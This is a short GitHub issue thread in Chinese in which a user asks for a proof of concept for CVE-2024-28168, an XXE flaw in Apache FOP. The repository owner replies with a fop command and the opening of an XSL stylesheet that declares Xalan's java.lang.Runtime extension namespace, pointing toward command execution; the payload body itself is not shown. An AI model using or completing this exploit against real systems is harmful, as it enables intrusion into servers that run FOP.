c1gar / c1gar.github.io

0 stars 0 forks source link

师傅你好,请问这个漏洞是你发现的吗? 想问下poc,不胜感激 #1

Open TonyD0g opened 1 month ago

TonyD0g commented 1 month ago

师傅你好,请问这个漏洞是你发现的吗? 想问下poc,不胜感激 CVE-2024-28168:Apache XML Graphics FOP存在XML外部实体(XXE)处理漏洞

c1gar commented 1 month ago

你好,以下就是我的poc,希望对你有所帮助。poc是命令行执行poc

fop -xml test.xml -xsl test.xsl -pdf test.pdf

test.xsl内容如下:

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">

TonyD0g ***@***.***> 于2024年10月11日周五 14:59写道: > 师傅你好,请问这个漏洞是你发现的吗? 想问下poc,不胜感激 > CVE-2024-28168 :Apache > XML Graphics FOP存在XML外部实体(XXE)处理漏洞 > > — > Reply to this email directly, view it on GitHub > , or unsubscribe > > . > You are receiving this because you are subscribed to this thread.Message > ID: ***@***.***> >
TonyD0g commented 1 month ago

我已经搞出来了,但还是十分感谢你回复我